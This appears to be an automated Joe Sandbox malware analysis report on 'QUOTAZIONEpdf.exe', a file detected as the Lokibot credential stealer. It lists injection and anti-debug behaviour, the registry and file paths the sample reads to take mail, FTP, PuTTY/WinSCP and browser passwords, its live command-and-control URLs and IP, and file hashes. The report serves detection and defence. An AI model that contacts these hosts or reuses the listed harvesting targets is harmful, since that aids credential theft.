          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exe TID: 4772Thread sleep time: -840000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00405D7C FindFirstFileA,FindClose,1_2_00405D7C
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004053AA
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00402630 FindFirstFileA,1_2_00402630
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeAPI call chain: ExitProcess graph end nodegraph_1-3623
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeAPI call chain: ExitProcess graph end nodegraph_1-3627
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405DA3
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,2_2_00402B7C
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019E79A mov eax, dword ptr fs:[00000030h]1_2_0019E79A
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019EADC mov eax, dword ptr fs:[00000030h]1_2_0019EADC
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019EA5F mov eax, dword ptr fs:[00000030h]1_2_0019EA5F
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019EA9E mov eax, dword ptr fs:[00000030h]1_2_0019EA9E
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0019E9AE mov eax, dword ptr fs:[00000030h]1_2_0019E9AE
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]2_2_0040317B

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeMemory written: C:\Users\user\Desktop\QUOTAZIONEpdf.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" Jump to behavior
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.556262976.0000000000E20000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,1_2_00405AA7
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00406069 GetUserNameW,2_2_00406069

          Stealing of Sensitive Information:

          barindex
          Yara detected LokibotShow sources
          Source: Yara matchFile source: 00000002.00000003.316877844.0000000000533000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.556036179.0000000000518000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 6352, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 808, type: MEMORYSTR
          Tries to steal Mail credentials (via file / registry access)Show sources
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
          Tries to harvest and steal ftp login credentialsShow sources
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
          Tries to steal Mail credentials (via file registry)Show sources
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: PopPassword2_2_0040D069
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: SmtpPassword2_2_0040D069
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected LokibotShow sources
          Source: Yara matchFile source: 00000002.00000003.316877844.0000000000533000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.556036179.0000000000518000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 6352, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 808, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionAccess Token Manipulation1Deobfuscate/Decode Files or Information1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information2Credentials in Registry2File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing1Security Account ManagerSystem Information Discovery5SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading11NTDSSecurity Software Discovery1Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion11LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsVirtualization/Sandbox Evasion11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          QUOTAZIONEpdf.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.QUOTAZIONEpdf.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.2.QUOTAZIONEpdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.0.QUOTAZIONEpdf.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.2.QUOTAZIONEpdf.exe.3040000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.0.QUOTAZIONEpdf.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.1.QUOTAZIONEpdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.0.QUOTAZIONEpdf.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.0.QUOTAZIONEpdf.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.0.QUOTAZIONEpdf.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.0.QUOTAZIONEpdf.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File

          Domains

          SourceDetectionScannerLabelLink
          slimpackage.com5%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
          http://alphastand.win/alien/fre.php0%URL Reputationsafe
          http://alphastand.trade/alien/fre.php0%URL Reputationsafe
          http://alphastand.top/alien/fre.php0%URL Reputationsafe
          http://www.ibsensoftware.com/0%URL Reputationsafe
          http://slimpackage.com/slimmain/five/fre.php9%VirustotalBrowse
          http://slimpackage.com/slimmain/five/fre.php100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          slimpackage.com
          		104.223.93.105
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://kbfvzoboss.bid/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://alphastand.win/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://alphastand.trade/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://alphastand.top/alien/fre.phptrue
          • URL Reputation: safe
          		unknown
          http://slimpackage.com/slimmain/five/fre.phptrue
          • 9%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nsis.sf.net/NSIS_ErrorQUOTAZIONEpdf.exefalse
            		high
            http://nsis.sf.net/NSIS_ErrorErrorQUOTAZIONEpdf.exefalse
              		high
              http://www.ibsensoftware.com/QUOTAZIONEpdf.exe, QUOTAZIONEpdf.exe, 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, QUOTAZIONEpdf.exe, 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              104.223.93.105
              		slimpackage.comUnited States
              		8100ASN-QUADRANET-GLOBALUStrue

              Private

              IP
              192.168.2.1

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:553085
              Start date:14.01.2022
              Start time:09:51:34
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 41s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:QUOTAZIONEpdf.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:20
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@3/6@56/2
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 73.1% (good quality ratio 70.4%)
              • Quality average: 79.1%
              • Quality standard deviation: 27.8%
              HCA Information:
              • Successful, ratio: 88%
              • Number of executed functions: 63
              • Number of non-executed functions: 38
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              09:52:41API Interceptor53x Sleep call for process: QUOTAZIONEpdf.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              104.223.93.105__.exeGet hashmaliciousBrowse
              • slimpackage.com/slimmain/five/fre.php
              Purchase Order #5000012803.exeGet hashmaliciousBrowse
              • slimpackage.com/slimfit/five/fre.php
              Trasferimento.vbsGet hashmaliciousBrowse
              • nofearsw.in/cgi-sys/suspendedpage.cgi
              EL1aBD5Zqr.exeGet hashmaliciousBrowse
              • nofearsw.in/swo/inc/11828554f46a7d.php
              TnUFqujldH.exeGet hashmaliciousBrowse
              • nofearsw.in/swo/inc/11828554f46a7d.php
              20210711494754.vbsGet hashmaliciousBrowse
              • nofearsw.in/fen/inc/9fa099d0b6dea5.php
              msg001.vbsGet hashmaliciousBrowse
              • nofearsw.in/swo/inc/11828554f46a7d.php
              Chuyen giao,pdf.vbsGet hashmaliciousBrowse
              • nofearsw.in/swo/inc/11828554f46a7d.php
              Dekont.vbsGet hashmaliciousBrowse
              • nofearsw.in/swo/inc/11828554f46a7d.php
              3Bws6ne7Ye.exeGet hashmaliciousBrowse
              • jlpack.email/file/Panel/five/fre.php
              filDHjBKef.exeGet hashmaliciousBrowse
              • jlpack.email/grace/Panel/five/fre.php

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              slimpackage.com__.exeGet hashmaliciousBrowse
              • 104.223.93.105
              Purchase Order #5000012803.exeGet hashmaliciousBrowse
              • 104.223.93.105

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              ASN-QUADRANET-GLOBALUS__.exeGet hashmaliciousBrowse
              • 104.223.93.105
              Purchase Order #5000012803.exeGet hashmaliciousBrowse
              • 104.223.93.105
              payload1.exeGet hashmaliciousBrowse
              • 72.11.157.208
              81LeRZW5BdGet hashmaliciousBrowse
              • 45.199.228.213
              27mfOKe6HtGet hashmaliciousBrowse
              • 162.220.9.180
              Antisocial.armGet hashmaliciousBrowse
              • 45.199.228.220
              BoFA_Remittance Advice.BoFA00002251.xlsbGet hashmaliciousBrowse
              • 104.223.119.167
              b0Ht6p5D1JGet hashmaliciousBrowse
              • 23.156.2.11
              Payment Remittance Advice_000000202213.xlsbGet hashmaliciousBrowse
              • 104.223.119.167
              5aUrqt6CKTGet hashmaliciousBrowse
              • 154.205.102.18
              Dm2sVBT0DWGet hashmaliciousBrowse
              • 45.199.228.242
              arm7Get hashmaliciousBrowse
              • 23.153.31.214
              armGet hashmaliciousBrowse
              • 23.153.31.218
              UvGeBNTPpT.exeGet hashmaliciousBrowse
              • 67.215.246.10
              7ega.x86Get hashmaliciousBrowse
              • 104.247.190.160
              yB9IhcEMywGet hashmaliciousBrowse
              • 204.152.199.240
              Fourloko.arm-20211230-1450Get hashmaliciousBrowse
              • 45.199.228.235
              abcGet hashmaliciousBrowse
              • 155.94.205.13
              arm7Get hashmaliciousBrowse
              • 45.199.228.221
              knwX1OWtYZGet hashmaliciousBrowse
              • 173.205.82.82

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\nsr3B6A.tmp
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:data
              Category:dropped
              Size (bytes):250687
              Entropy (8bit):7.724868567895106
              Encrypted:false
              SSDEEP:3072:1DyoBWj0S6M6pd7gA/FY2eM203epRkhG2AW3cKGPx5UvG0TTxT5ToKbvosMUC1qk:BZS6M6v0OSV/pShtRMtIzxdvg
              MD5:17CCB3C022F9B93E6E7E2A40C253DE9B
              SHA1:4D99B2643277CCA9B2FFC1DB5E9247212EA155F0
              SHA-256:AB11BFD0AF1FE8B3C42E933F37DFDA582152FFF477AA9DDE4EBB1ADFBD7BC72E
              SHA-512:E292772D295B45C85E79D6CE37F607F977F20F337DA679B6A2EA78D436631D6DAA9CB844D70A6239F851E1709309D94A0EB808C8AA949A0FB4393F3876333282
              Malicious:false
              Reputation:low
              Preview: v`......,...................!....I......._......^`..........................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):4096
              Entropy (8bit):3.801392215291429
              Encrypted:false
              SSDEEP:24:e1GSb0JDlOErEcQeV3ax/+FBFUQahkFsAryvDTy2La5DTyxk8q6I1nPnRuV4MPgs:SgZF4h6FBFUQYXze9r6IPRuqStkx
              MD5:7F8DBC496B4EB973EC6509A63B7A4C01
              SHA1:E3E07E016B3A97604B94CBF8CB2C0FC0BF21033D
              SHA-256:4B229D563D725A5F994DEBF010F24F43D6078C18EF1D56628F9815372CA45FC6
